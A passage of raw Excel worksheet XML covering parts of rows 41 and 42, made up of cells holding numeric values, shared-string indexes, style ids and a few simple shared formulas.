        <v>0</v>
      </c>
      <c r="IV41" s="107">
        <v>0</v>
      </c>
      <c r="IW41" s="108">
        <v>0</v>
      </c>
      <c r="IX41" s="109">
        <v>0</v>
      </c>
      <c r="IY41" s="110">
        <v>0</v>
      </c>
      <c r="IZ41" s="501">
        <v>0</v>
      </c>
      <c r="JA41" s="111">
        <v>0</v>
      </c>
      <c r="JB41" s="111">
        <v>0</v>
      </c>
      <c r="JC41" s="112">
        <v>0</v>
      </c>
      <c r="JD41" s="113">
        <v>0</v>
      </c>
      <c r="JE41" s="114">
        <v>0</v>
      </c>
      <c r="JF41" s="503">
        <v>0</v>
      </c>
      <c r="JG41" s="115">
        <v>0</v>
      </c>
      <c r="JH41" s="115">
        <v>0</v>
      </c>
      <c r="JI41" s="116">
        <v>0</v>
      </c>
      <c r="JJ41" s="101">
        <v>0</v>
      </c>
      <c r="JK41" s="102">
        <v>0</v>
      </c>
      <c r="JL41" s="102">
        <v>0</v>
      </c>
      <c r="JM41" s="103">
        <v>0</v>
      </c>
      <c r="JN41" s="103">
        <v>0</v>
      </c>
      <c r="JO41" s="104">
        <v>0</v>
      </c>
      <c r="JP41" s="105">
        <v>0</v>
      </c>
      <c r="JQ41" s="106">
        <v>0</v>
      </c>
      <c r="JR41" s="497">
        <v>0</v>
      </c>
      <c r="JS41" s="107">
        <v>0</v>
      </c>
      <c r="JT41" s="107">
        <v>0</v>
      </c>
      <c r="JU41" s="108">
        <v>0</v>
      </c>
      <c r="JV41" s="109">
        <v>0</v>
      </c>
      <c r="JW41" s="110">
        <v>0</v>
      </c>
      <c r="JX41" s="501">
        <v>0</v>
      </c>
      <c r="JY41" s="111">
        <v>0</v>
      </c>
      <c r="JZ41" s="111">
        <v>0</v>
      </c>
      <c r="KA41" s="112">
        <v>0</v>
      </c>
      <c r="KB41" s="113">
        <v>0</v>
      </c>
      <c r="KC41" s="114">
        <v>0</v>
      </c>
      <c r="KD41" s="503">
        <v>0</v>
      </c>
      <c r="KE41" s="115">
        <v>0</v>
      </c>
      <c r="KF41" s="115">
        <v>0</v>
      </c>
      <c r="KG41" s="116">
        <v>0</v>
      </c>
      <c r="KH41" s="250">
        <v>0</v>
      </c>
      <c r="KI41" s="251">
        <v>0</v>
      </c>
      <c r="KJ41" s="505">
        <v>0</v>
      </c>
      <c r="KK41" s="252">
        <v>0</v>
      </c>
      <c r="KL41" s="252">
        <v>0</v>
      </c>
      <c r="KM41" s="253">
        <v>0</v>
      </c>
      <c r="KN41" s="101">
        <v>0</v>
      </c>
      <c r="KO41" s="102">
        <v>0</v>
      </c>
      <c r="KP41" s="102">
        <v>0</v>
      </c>
      <c r="KQ41" s="103">
        <v>0</v>
      </c>
      <c r="KR41" s="103">
        <v>0</v>
      </c>
      <c r="KS41" s="104">
        <v>0</v>
      </c>
      <c r="KT41" s="105">
        <v>0</v>
      </c>
      <c r="KU41" s="106">
        <v>0</v>
      </c>
      <c r="KV41" s="497">
        <v>0</v>
      </c>
      <c r="KW41" s="107">
        <v>0</v>
      </c>
      <c r="KX41" s="107">
        <v>0</v>
      </c>
      <c r="KY41" s="108">
        <v>0</v>
      </c>
      <c r="KZ41" s="109">
        <v>0</v>
      </c>
      <c r="LA41" s="110">
        <v>0</v>
      </c>
      <c r="LB41" s="501">
        <v>0</v>
      </c>
      <c r="LC41" s="111">
        <v>0</v>
      </c>
      <c r="LD41" s="111">
        <v>0</v>
      </c>
      <c r="LE41" s="112">
        <v>0</v>
      </c>
      <c r="LF41" s="113">
        <v>0</v>
      </c>
      <c r="LG41" s="114">
        <v>0</v>
      </c>
      <c r="LH41" s="503">
        <v>0</v>
      </c>
      <c r="LI41" s="115">
        <v>0</v>
      </c>
      <c r="LJ41" s="115">
        <v>0</v>
      </c>
      <c r="LK41" s="116">
        <v>0</v>
      </c>
      <c r="LL41" s="117">
        <v>3</v>
      </c>
      <c r="LM41" s="507">
        <v>3</v>
      </c>
      <c r="LN41" s="119">
        <v>1</v>
      </c>
      <c r="LO41" s="119">
        <v>2</v>
      </c>
      <c r="LP41" s="119">
        <v>1</v>
      </c>
      <c r="LQ41" s="119">
        <v>1</v>
      </c>
      <c r="LR41" s="119">
        <v>1</v>
      </c>
      <c r="LS41" s="119">
        <v>1</v>
      </c>
      <c r="LT41" s="382"/>
      <c r="LU41" s="117">
        <v>0</v>
      </c>
      <c r="LV41" s="118">
        <v>0</v>
      </c>
      <c r="LW41" s="507">
        <v>0</v>
      </c>
      <c r="LX41" s="119">
        <v>0</v>
      </c>
      <c r="LY41" s="119">
        <v>0</v>
      </c>
      <c r="LZ41" s="119">
        <v>0</v>
      </c>
      <c r="MA41" s="117">
        <v>0</v>
      </c>
      <c r="MB41" s="118">
        <v>0</v>
      </c>
      <c r="MC41" s="507">
        <v>0</v>
      </c>
      <c r="MD41" s="119">
        <v>0</v>
      </c>
      <c r="ME41" s="119">
        <v>0</v>
      </c>
      <c r="MF41" s="119">
        <v>0</v>
      </c>
      <c r="MG41" s="117">
        <v>0</v>
      </c>
      <c r="MH41" s="118">
        <v>0</v>
      </c>
      <c r="MI41" s="507">
        <v>0</v>
      </c>
      <c r="MJ41" s="119">
        <v>0</v>
      </c>
      <c r="MK41" s="119">
        <v>0</v>
      </c>
      <c r="ML41" s="119">
        <v>0</v>
      </c>
      <c r="MM41" s="117">
        <v>1</v>
      </c>
      <c r="MN41" s="118" t="s">
        <v>4213</v>
      </c>
      <c r="MO41" s="507">
        <v>1</v>
      </c>
      <c r="MP41" s="119" t="s">
        <v>3118</v>
      </c>
      <c r="MQ41" s="119">
        <v>1</v>
      </c>
      <c r="MR41" s="119">
        <v>1</v>
      </c>
      <c r="MS41" s="117">
        <v>0</v>
      </c>
      <c r="MT41" s="118">
        <v>0</v>
      </c>
      <c r="MU41" s="507">
        <v>0</v>
      </c>
      <c r="MV41" s="119">
        <v>0</v>
      </c>
      <c r="MW41" s="119">
        <v>0</v>
      </c>
      <c r="MX41" s="119">
        <v>0</v>
      </c>
      <c r="MY41" s="117">
        <v>0</v>
      </c>
      <c r="MZ41" s="118">
        <v>0</v>
      </c>
      <c r="NA41" s="507">
        <v>0</v>
      </c>
      <c r="NB41" s="119">
        <v>0</v>
      </c>
      <c r="NC41" s="119">
        <v>0</v>
      </c>
      <c r="ND41" s="119">
        <v>0</v>
      </c>
      <c r="NE41" s="117">
        <v>0</v>
      </c>
      <c r="NF41" s="118">
        <v>0</v>
      </c>
      <c r="NG41" s="507">
        <v>0</v>
      </c>
      <c r="NH41" s="119">
        <v>0</v>
      </c>
      <c r="NI41" s="119">
        <v>0</v>
      </c>
      <c r="NJ41" s="119">
        <v>0</v>
      </c>
      <c r="NK41" s="117">
        <v>1</v>
      </c>
      <c r="NL41" s="118" t="s">
        <v>4167</v>
      </c>
      <c r="NM41" s="507">
        <v>1</v>
      </c>
      <c r="NN41" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO41" s="119">
        <v>1</v>
      </c>
      <c r="NP41" s="119">
        <v>1</v>
      </c>
      <c r="NQ41" s="117">
        <v>0</v>
      </c>
      <c r="NR41" s="118">
        <v>0</v>
      </c>
      <c r="NS41" s="507">
        <v>0</v>
      </c>
      <c r="NT41" s="119">
        <v>0</v>
      </c>
      <c r="NU41" s="119">
        <v>0</v>
      </c>
      <c r="NV41" s="119">
        <v>0</v>
      </c>
      <c r="NW41" s="117">
        <v>1</v>
      </c>
      <c r="NX41" s="118" t="s">
        <v>4356</v>
      </c>
      <c r="NY41" s="507">
        <v>1</v>
      </c>
      <c r="NZ41" s="119" t="s">
        <v>3119</v>
      </c>
      <c r="OA41" s="119">
        <v>1</v>
      </c>
      <c r="OB41" s="119">
        <v>1</v>
      </c>
      <c r="OC41" s="120">
        <v>3</v>
      </c>
      <c r="OD41" s="120">
        <v>2</v>
      </c>
      <c r="OE41" s="120">
        <v>2</v>
      </c>
      <c r="OF41" s="121">
        <v>1</v>
      </c>
      <c r="OG41" s="120">
        <v>1</v>
      </c>
      <c r="OH41" s="120">
        <v>1</v>
      </c>
      <c r="OI41" s="120">
        <v>1</v>
      </c>
      <c r="OJ41" s="120">
        <v>1</v>
      </c>
      <c r="OK41" s="383"/>
      <c r="OL41" s="120">
        <v>2</v>
      </c>
      <c r="OM41" s="120">
        <v>2</v>
      </c>
      <c r="ON41" s="120">
        <v>1</v>
      </c>
      <c r="OO41" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP41" s="120">
        <v>1</v>
      </c>
      <c r="OQ41" s="464">
        <v>1</v>
      </c>
      <c r="OR41" s="120">
        <v>1</v>
      </c>
      <c r="OS41" s="120">
        <v>1</v>
      </c>
      <c r="OT41" s="120">
        <v>1</v>
      </c>
      <c r="OU41" s="120" t="s">
        <v>3121</v>
      </c>
      <c r="OV41" s="120">
        <v>1</v>
      </c>
      <c r="OW41" s="464">
        <v>1</v>
      </c>
      <c r="OX41" s="120">
        <v>0</v>
      </c>
      <c r="OY41" s="120">
        <v>0</v>
      </c>
      <c r="OZ41" s="120">
        <v>0</v>
      </c>
      <c r="PA41" s="120"/>
      <c r="PB41" s="120">
        <v>0</v>
      </c>
      <c r="PC41" s="464">
        <v>0</v>
      </c>
      <c r="PD41" s="120">
        <v>0</v>
      </c>
      <c r="PE41" s="120">
        <v>0</v>
      </c>
      <c r="PF41" s="120">
        <v>0</v>
      </c>
      <c r="PG41" s="120"/>
      <c r="PH41" s="120">
        <v>0</v>
      </c>
      <c r="PI41" s="464">
        <v>0</v>
      </c>
      <c r="PJ41" s="120">
        <v>0</v>
      </c>
      <c r="PK41" s="120">
        <v>0</v>
      </c>
      <c r="PL41" s="120">
        <v>0</v>
      </c>
      <c r="PM41" s="120"/>
      <c r="PN41" s="120">
        <v>0</v>
      </c>
      <c r="PO41" s="464">
        <v>0</v>
      </c>
      <c r="PP41" s="120">
        <v>0</v>
      </c>
      <c r="PQ41" s="120">
        <v>0</v>
      </c>
      <c r="PR41" s="120">
        <v>0</v>
      </c>
      <c r="PS41" s="120"/>
      <c r="PT41" s="120">
        <v>0</v>
      </c>
      <c r="PU41" s="464">
        <v>0</v>
      </c>
      <c r="PV41" s="120">
        <v>0</v>
      </c>
      <c r="PW41" s="120">
        <v>0</v>
      </c>
      <c r="PX41" s="120">
        <v>0</v>
      </c>
      <c r="PY41" s="120"/>
      <c r="PZ41" s="120">
        <v>0</v>
      </c>
      <c r="QA41" s="464">
        <v>0</v>
      </c>
      <c r="QB41" s="120">
        <v>0</v>
      </c>
      <c r="QC41" s="120">
        <v>0</v>
      </c>
      <c r="QD41" s="120">
        <v>0</v>
      </c>
      <c r="QE41" s="120"/>
      <c r="QF41" s="120">
        <v>0</v>
      </c>
      <c r="QG41" s="464">
        <v>0</v>
      </c>
      <c r="QH41" s="120">
        <v>3</v>
      </c>
      <c r="QI41" s="120">
        <v>3</v>
      </c>
      <c r="QJ41" s="120">
        <v>1</v>
      </c>
      <c r="QK41" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL41" s="120">
        <v>1</v>
      </c>
      <c r="QM41" s="464">
        <v>1</v>
      </c>
      <c r="QN41" s="120">
        <v>0</v>
      </c>
      <c r="QO41" s="120">
        <v>0</v>
      </c>
      <c r="QP41" s="120">
        <v>0</v>
      </c>
      <c r="QQ41" s="120"/>
      <c r="QR41" s="120">
        <v>0</v>
      </c>
      <c r="QS41" s="464">
        <v>0</v>
      </c>
      <c r="QT41" s="184"/>
      <c r="QU41" s="184"/>
      <c r="QV41" s="184"/>
      <c r="QW41" s="184"/>
      <c r="QX41" s="184"/>
      <c r="QY41" s="184"/>
      <c r="QZ41" s="184"/>
      <c r="RA41" s="184"/>
      <c r="RB41" s="184"/>
      <c r="RC41" s="184"/>
      <c r="RD41" s="184"/>
      <c r="RE41" s="184"/>
      <c r="RF41" s="184"/>
      <c r="RG41" s="184"/>
      <c r="RH41" s="184"/>
      <c r="RI41" s="184"/>
      <c r="RJ41" s="184"/>
      <c r="RK41" s="184"/>
      <c r="RL41" s="184"/>
      <c r="RM41" s="184"/>
      <c r="RN41" s="184"/>
      <c r="RO41" s="184"/>
      <c r="RP41" s="184"/>
      <c r="RQ41" s="184"/>
      <c r="RR41" s="184"/>
      <c r="RS41" s="184"/>
      <c r="RT41" s="184"/>
      <c r="RU41" s="184"/>
      <c r="RV41" s="184"/>
      <c r="RW41" s="184"/>
      <c r="RX41" s="184"/>
      <c r="RY41" s="184"/>
      <c r="RZ41" s="184"/>
      <c r="SA41" s="184"/>
      <c r="SB41" s="184"/>
      <c r="SC41" s="184"/>
      <c r="SD41" s="184"/>
      <c r="SE41" s="184"/>
      <c r="SF41" s="184"/>
      <c r="SG41" s="184"/>
      <c r="SH41" s="184"/>
      <c r="SI41" s="184"/>
      <c r="SJ41" s="184"/>
      <c r="SK41" s="184"/>
      <c r="SL41" s="184"/>
      <c r="SM41" s="184"/>
      <c r="SN41" s="184"/>
      <c r="SO41" s="184"/>
      <c r="SP41" s="184"/>
      <c r="SQ41" s="184"/>
      <c r="SR41" s="184"/>
      <c r="SS41" s="184"/>
      <c r="ST41" s="184"/>
      <c r="SU41" s="184"/>
      <c r="SV41" s="184"/>
      <c r="SW41" s="184"/>
      <c r="SX41" s="184"/>
      <c r="SY41" s="184"/>
      <c r="SZ41" s="184"/>
      <c r="TA41" s="184"/>
      <c r="TB41" s="184"/>
      <c r="TC41" s="184"/>
      <c r="TD41" s="184"/>
      <c r="TE41" s="184"/>
      <c r="TF41" s="184"/>
      <c r="TG41" s="184"/>
      <c r="TH41" s="184"/>
      <c r="TI41" s="184"/>
      <c r="TJ41" s="184"/>
      <c r="TK41" s="184"/>
      <c r="TL41" s="184"/>
      <c r="TM41" s="184"/>
      <c r="TN41" s="184"/>
      <c r="TO41" s="184"/>
      <c r="TP41" s="184"/>
      <c r="TQ41" s="184"/>
      <c r="TR41" s="184"/>
      <c r="TS41" s="184"/>
      <c r="TT41" s="184"/>
      <c r="TU41" s="184"/>
      <c r="TV41" s="184"/>
      <c r="TW41" s="184"/>
      <c r="TX41" s="184"/>
      <c r="TY41" s="184"/>
      <c r="TZ41" s="184"/>
      <c r="UA41" s="184"/>
      <c r="UB41" s="184"/>
      <c r="UC41" s="184"/>
      <c r="UD41" s="184"/>
      <c r="UE41" s="184"/>
      <c r="UF41" s="184"/>
      <c r="UG41" s="184"/>
      <c r="UH41" s="184"/>
      <c r="UI41" s="184"/>
      <c r="UJ41" s="184"/>
      <c r="UK41" s="184"/>
      <c r="UL41" s="184"/>
      <c r="UM41" s="184"/>
      <c r="UN41" s="184"/>
      <c r="UO41" s="184"/>
      <c r="UP41" s="184"/>
      <c r="UQ41" s="184"/>
      <c r="UR41" s="184"/>
      <c r="US41" s="184"/>
      <c r="UT41" s="184"/>
      <c r="UU41" s="184"/>
      <c r="UV41" s="184"/>
      <c r="UW41" s="184"/>
      <c r="UX41" s="184"/>
      <c r="UY41" s="184"/>
      <c r="UZ41" s="184"/>
      <c r="VA41" s="184"/>
      <c r="VB41" s="184"/>
      <c r="VC41" s="184"/>
      <c r="VD41" s="184"/>
      <c r="VE41" s="184"/>
      <c r="VF41" s="184"/>
      <c r="VG41" s="184"/>
      <c r="VH41" s="184"/>
      <c r="VI41" s="184"/>
      <c r="VJ41" s="184"/>
      <c r="VK41" s="184"/>
      <c r="VL41" s="184"/>
      <c r="VM41" s="184"/>
      <c r="VN41" s="184"/>
      <c r="VO41" s="184"/>
      <c r="VP41" s="184"/>
      <c r="VQ41" s="184"/>
      <c r="VR41" s="184"/>
      <c r="VS41" s="184"/>
      <c r="VT41" s="184"/>
      <c r="VU41" s="184"/>
      <c r="VV41" s="184"/>
      <c r="VW41" s="184"/>
      <c r="VX41" s="184"/>
      <c r="VY41" s="184"/>
    </row>
    <row r="42" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A42" s="82" t="s">
        <v>72</v>
      </c>
      <c r="B42" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C42" s="83" t="s">
        <v>437</v>
      </c>
      <c r="D42" s="83" t="s">
        <v>80</v>
      </c>
      <c r="E42" s="83">
        <f t="shared" si="2"/>
        <v>32</v>
      </c>
      <c r="F42" s="83" t="s">
        <v>81</v>
      </c>
      <c r="G42" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H42" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I42" s="81" t="s">
        <v>1115</v>
      </c>
      <c r="J42" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K42" s="81" t="s">
        <v>1130</v>
      </c>
      <c r="L42" s="81" t="s">
        <v>1131</v>
      </c>
      <c r="M42" s="378" t="s">
        <v>214</v>
      </c>
      <c r="N42" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O42" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P42" s="91"/>
      <c r="Q42" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R42" s="92" t="s">
        <v>1132</v>
      </c>
      <c r="S42" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T42" s="92" t="s">
        <v>1133</v>
      </c>
      <c r="U42" s="94" t="s">
        <v>1134</v>
      </c>
      <c r="V42" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W42" s="96" t="s">
        <v>1120</v>
      </c>
      <c r="X42" s="97" t="s">
        <v>1135</v>
      </c>
      <c r="Y42" s="83" t="s">
        <v>1136</v>
      </c>
      <c r="Z42" s="98" t="s">
        <v>1137</v>
      </c>
      <c r="AA42" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB42" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC42" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD42" s="83"/>
      <c r="AE42" s="83"/>
      <c r="AF42" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG42" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH42" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI42" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ42" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK42" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL42" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM42" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN42" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO42" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP42" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ42" s="358">
        <v>1</v>
      </c>
      <c r="AR42" s="100"/>
      <c r="AS42" s="100">
        <v>1</v>
      </c>
      <c r="AT42" s="100">
        <v>0</v>
      </c>
      <c r="AU42" s="100">
        <v>1</v>
      </c>
      <c r="AV42" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW42" s="100">
        <v>1</v>
      </c>
      <c r="AX42" s="100">
        <v>1</v>
      </c>
      <c r="AY42" s="100">
        <v>0</v>
      </c>
      <c r="AZ42" s="100">
        <v>1</v>
      </c>
      <c r="BA42" s="381"/>
      <c r="BB42" s="101">
        <v>2</v>
      </c>
      <c r="BC42" s="102" t="s">
        <v>1807</v>
      </c>
      <c r="BD42" s="102">
        <v>2</v>
      </c>
      <c r="BE42" s="103" t="s">
        <v>1808</v>
      </c>
      <c r="BF42" s="103">
        <v>2</v>
      </c>
      <c r="BG42" s="104">
        <v>1</v>
      </c>
      <c r="BH42" s="105">
        <v>2</v>
      </c>
      <c r="BI42" s="106" t="s">
        <v>1855</v>
      </c>
      <c r="BJ42" s="497">
        <v>2</v>
      </c>
      <c r="BK42" s="107" t="s">
        <v>1856</v>
      </c>
      <c r="BL42" s="107">
        <v>2</v>
      </c>
      <c r="BM42" s="108">
        <v>1</v>
      </c>
      <c r="BN42" s="109">
        <v>4</v>
      </c>
      <c r="BO42" s="110" t="s">
        <v>2008</v>
      </c>
      <c r="BP42" s="501">
        <v>4</v>
      </c>
      <c r="BQ42" s="111" t="s">
        <v>2009</v>
      </c>
      <c r="BR42" s="111">
        <v>4</v>
      </c>
      <c r="BS42" s="112">
        <v>1</v>
      </c>
      <c r="BT42" s="113">
        <v>7</v>
      </c>
      <c r="BU42" s="114" t="s">
        <v>1898</v>
      </c>
      <c r="BV42" s="503">
        <v>7</v>
      </c>
      <c r="BW42" s="115" t="s">
        <v>1899</v>
      </c>
      <c r="BX42" s="115">
        <v>7</v>
      </c>
      <c r="BY42" s="116">
        <v>1</v>
      </c>
      <c r="BZ42" s="250">
        <v>8</v>
      </c>
      <c r="CA42" s="251" t="s">
        <v>4480</v>
      </c>
      <c r="CB42" s="505">
        <v>5</v>
      </c>
      <c r="CC42" s="252" t="s">
        <v>4481</v>
      </c>
      <c r="CD42" s="252">
        <v>5</v>
      </c>
      <c r="CE42" s="253">
        <v>1</v>
      </c>
      <c r="CF42" s="101">
        <v>14</v>
      </c>
      <c r="CG42" s="102" t="s">
        <v>2096</v>
      </c>
      <c r="CH42" s="102">
        <v>12</v>
      </c>
      <c r="CI42" s="103" t="s">
        <v>2097</v>
      </c>
      <c r="CJ42" s="103">
        <v>12</v>
      </c>
      <c r="CK42" s="104">
        <v>1</v>
      </c>
      <c r="CL42" s="105">
        <v>0</v>
      </c>
      <c r="CM42" s="106">
        <v>0</v>
      </c>
      <c r="CN42" s="497">
        <v>0</v>
      </c>
      <c r="CO42" s="107">
        <v>0</v>
      </c>
      <c r="CP42" s="107">
        <v>0</v>
      </c>
      <c r="CQ42" s="108">
        <v>0</v>
      </c>
      <c r="CR42" s="109">
        <v>1</v>
      </c>
      <c r="CS42" s="110" t="s">
        <v>1943</v>
      </c>
      <c r="CT42" s="501">
        <v>1</v>
      </c>
      <c r="CU42" s="111" t="s">
        <v>1937</v>
      </c>
      <c r="CV42" s="111">
        <v>1</v>
      </c>
      <c r="CW42" s="112">
        <v>1</v>
      </c>
      <c r="CX42" s="113">
        <v>5</v>
      </c>
      <c r="CY42" s="114" t="s">
        <v>2151</v>
      </c>
      <c r="CZ42" s="503">
        <v>5</v>
      </c>
      <c r="DA42" s="115" t="s">
        <v>2152</v>
      </c>
      <c r="DB42" s="115">
        <v>5</v>
      </c>
      <c r="DC42" s="116">
        <v>1</v>
      </c>
      <c r="DD42" s="101">
        <v>1</v>
      </c>
      <c r="DE42" s="102" t="s">
        <v>1809</v>
      </c>
      <c r="DF42" s="102">
        <v>1</v>
      </c>
      <c r="DG42" s="103" t="s">
        <v>1810</v>
      </c>
      <c r="DH42" s="103">
        <v>1</v>
      </c>
      <c r="DI42" s="104">
        <v>1</v>
      </c>
      <c r="DJ42" s="105">
        <v>0</v>
      </c>
      <c r="DK42" s="106">
        <v>0</v>
      </c>
      <c r="DL42" s="497">
        <v>0</v>
      </c>
      <c r="DM42" s="107">
        <v>0</v>
      </c>
      <c r="DN42" s="107">
        <v>0</v>
      </c>
      <c r="DO42" s="108">
        <v>0</v>
      </c>
      <c r="DP42" s="109">
        <v>1</v>
      </c>
      <c r="DQ42" s="110" t="s">
        <v>1809</v>
      </c>
      <c r="DR42" s="501">
        <v>1</v>
      </c>
      <c r="DS42" s="111" t="s">
        <v>1810</v>
      </c>
      <c r="DT42" s="111">
        <v>1</v>
      </c>
      <c r="DU42" s="112">
        <v>1</v>
      </c>
      <c r="DV42" s="113">
        <v>6</v>
      </c>
      <c r="DW42" s="114" t="s">
        <v>3123</v>
      </c>
      <c r="DX42" s="503">
        <v>6</v>
      </c>
      <c r="DY42" s="115" t="s">
        <v>3124</v>
      </c>
      <c r="DZ42" s="115">
        <v>6</v>
      </c>
      <c r="EA42" s="116">
        <v>1</v>
      </c>
      <c r="EB42" s="250">
        <v>0</v>
      </c>
      <c r="EC42" s="251">
        <v>0</v>
      </c>
      <c r="ED42" s="505">
        <v>0</v>
      </c>
      <c r="EE42" s="252">
        <v>0</v>
      </c>
      <c r="EF42" s="252">
        <v>0</v>
      </c>
      <c r="EG42" s="253">
        <v>0</v>
      </c>
      <c r="EH42" s="101">
        <v>6</v>
      </c>
      <c r="EI42" s="102" t="s">
        <v>3123</v>
      </c>
      <c r="EJ42" s="102">
        <v>6</v>
      </c>
      <c r="EK42" s="103" t="s">
        <v>3124</v>
      </c>
      <c r="EL42" s="103">
        <v>6</v>
      </c>
      <c r="EM42" s="104">
        <v>1</v>
      </c>
      <c r="EN42" s="105">
        <v>0</v>
      </c>
      <c r="EO42" s="106">
        <v>0</v>
      </c>
      <c r="EP42" s="497">
        <v>0</v>
      </c>
      <c r="EQ42" s="107">
        <v>0</v>
      </c>
      <c r="ER42" s="107">
        <v>0</v>
      </c>
      <c r="ES42" s="108">
        <v>0</v>
      </c>
      <c r="ET42" s="109">
        <v>1</v>
      </c>
      <c r="EU42" s="110" t="s">
        <v>1943</v>
      </c>
      <c r="EV42" s="501">
        <v>1</v>
      </c>
      <c r="EW42" s="111" t="s">
        <v>1937</v>
      </c>
      <c r="EX42" s="111">
        <v>1</v>
      </c>
      <c r="EY42" s="112">
        <v>1</v>
      </c>
      <c r="EZ42" s="113">
        <v>2</v>
      </c>
      <c r="FA42" s="114" t="s">
        <v>3125</v>
      </c>
      <c r="FB42" s="503">
        <v>2</v>
      </c>
      <c r="FC42" s="115" t="s">
        <v>3126</v>
      </c>
      <c r="FD42" s="115">
        <v>2</v>
      </c>
      <c r="FE42" s="116">
        <v>1</v>
      </c>
      <c r="FF42" s="101">
        <v>1</v>
      </c>
      <c r="FG42" s="102" t="s">
        <v>3127</v>
      </c>
      <c r="FH42" s="102">
        <v>1</v>
      </c>
      <c r="FI42" s="103" t="s">
        <v>3128</v>
      </c>
      <c r="FJ42" s="103">
        <v>1</v>
      </c>
      <c r="FK42" s="104">
        <v>1</v>
      </c>
      <c r="FL42" s="105">
        <v>2</v>
      </c>
      <c r="FM42" s="106" t="s">
        <v>1855</v>
      </c>
      <c r="FN42" s="497">
        <v>2</v>
      </c>
      <c r="FO42" s="107" t="s">
        <v>1856</v>
      </c>
      <c r="FP42" s="107">
        <v>2</v>
      </c>
      <c r="FQ42" s="108">
        <v>1</v>
      </c>
      <c r="FR42" s="109">
        <v>3</v>
      </c>
      <c r="FS42" s="110" t="s">
        <v>3129</v>
      </c>
      <c r="FT42" s="501">
        <v>3</v>
      </c>
      <c r="FU42" s="111" t="s">
        <v>3130</v>
      </c>
      <c r="FV42" s="111">
        <v>3</v>
      </c>
      <c r="FW42" s="112">
        <v>1</v>
      </c>
      <c r="FX42" s="113">
        <v>1</v>
      </c>
      <c r="FY42" s="114" t="s">
        <v>3127</v>
      </c>
      <c r="FZ42" s="503">
        <v>1</v>
      </c>
      <c r="GA42" s="115" t="s">
        <v>3128</v>
      </c>
      <c r="GB42" s="115">
        <v>1</v>
      </c>
      <c r="GC42" s="116">
        <v>1</v>
      </c>
      <c r="GD42" s="250">
        <v>8</v>
      </c>
      <c r="GE42" s="251" t="s">
        <v>4480</v>
      </c>
      <c r="GF42" s="505">
        <v>5</v>
      </c>
      <c r="GG42" s="252" t="s">
        <v>4481</v>
      </c>
      <c r="GH42" s="252">
        <v>5</v>
      </c>
      <c r="GI42" s="253">
        <v>1</v>
      </c>
      <c r="GJ42" s="101">
        <v>8</v>
      </c>
      <c r="GK42" s="102" t="s">
        <v>3131</v>
      </c>
      <c r="GL42" s="102">
        <v>6</v>
      </c>
      <c r="GM42" s="103" t="s">
        <v>3132</v>
      </c>
      <c r="GN42" s="103">
        <v>6</v>
      </c>
      <c r="GO42" s="104">
        <v>1</v>
      </c>
      <c r="GP42" s="105">
        <v>0</v>
      </c>
      <c r="GQ42" s="106">
        <v>0</v>
      </c>
      <c r="GR42" s="497">
        <v>0</v>
      </c>
      <c r="GS42" s="107">
        <v>0</v>
      </c>
      <c r="GT42" s="107">
        <v>0</v>
      </c>
      <c r="GU42" s="108">
        <v>0</v>
      </c>
      <c r="GV42" s="109">
        <v>0</v>
      </c>
      <c r="GW42" s="110">
        <v>0</v>
      </c>
      <c r="GX42" s="501">
        <v>0</v>
      </c>
      <c r="GY42" s="111">
        <v>0</v>
      </c>
      <c r="GZ42" s="111">
        <v>0</v>
      </c>
      <c r="HA42" s="112">
        <v>0</v>
      </c>
      <c r="HB42" s="113">
        <v>3</v>
      </c>
      <c r="HC42" s="114" t="s">
        <v>3129</v>
      </c>
      <c r="HD42" s="503">
        <v>3</v>
      </c>
      <c r="HE42" s="115" t="s">
        <v>3130</v>
      </c>
      <c r="HF42" s="115">
        <v>3</v>
      </c>
      <c r="HG42" s="116">
        <v>1</v>
      </c>
      <c r="HH42" s="101">
        <v>0</v>
      </c>
      <c r="HI42" s="102">
        <v>0</v>
      </c>
      <c r="HJ42" s="102">
        <v>0</v>
      </c>
      <c r="HK42" s="103">
        <v>0</v>
      </c>
      <c r="HL42" s="103">
        <v>0</v>
      </c>
      <c r="HM42" s="104">
        <v>0</v>
      </c>
      <c r="HN42" s="105">
        <v>0</v>
      </c>
      <c r="HO42" s="106">
        <v>0</v>
      </c>
      <c r="HP42" s="497">
        <v>0</v>
      </c>
      <c r="HQ42" s="107">
        <v>0</v>
      </c>
      <c r="HR42" s="107">
        <v>0</v>
      </c>
      <c r="HS42" s="108">
        <v>0</v>
      </c>
      <c r="HT42" s="109">
        <v>0</v>
      </c>
      <c r="HU42" s="110">
        <v>0</v>
      </c>
      <c r="HV42" s="501">
        <v>0</v>
      </c>
      <c r="HW42" s="111">
        <v>0</v>
      </c>
      <c r="HX42" s="111">
        <v>0</v>
      </c>
      <c r="HY42" s="112">
        <v>0</v>
      </c>
      <c r="HZ42" s="113">
        <v>0</v>
      </c>
      <c r="IA42" s="114">
        <v>0</v>
      </c>
      <c r="IB42" s="503">
        <v>0</v>
      </c>
      <c r="IC42" s="115">
        <v>0</v>
      </c>
      <c r="ID42" s="115">
        <v>0</v>
      </c>
